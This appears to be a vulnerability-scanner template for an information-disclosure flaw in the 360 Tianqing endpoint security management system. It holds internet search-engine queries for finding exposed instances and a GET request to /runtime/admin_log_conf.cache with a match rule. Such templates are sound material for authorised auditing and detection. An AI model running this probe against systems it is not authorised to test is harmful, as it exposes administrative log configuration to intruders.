漏洞描述
Fofa: title="360新天擎"
Hunter: web.title="360新天擎"
ZoomEye: app:"Tianqing terminal management"
id: qianxin-360tianqing-adminlogconf-disclosure
info:
name: 360新天擎终端安全管理系统信息泄露漏洞
author: zan8in
severity: high
verified: true
description: |-
Fofa: title="360新天擎"
Hunter: web.title="360新天擎"
ZoomEye: app:"Tianqing terminal management"
reference:
- https://mp.weixin.qq.com/s/_Hoi_ESDEEIL81RY37nDcQ
tags: qianxin,360tianqing,disclosure
created: 2023/11/21
rules:
r0:
request:
method: GET
path: /runtime/admin_log_conf.cache
expression: response.status == 200 && response.body.bcontains(b's:12:"/login/login"')
expression: r0()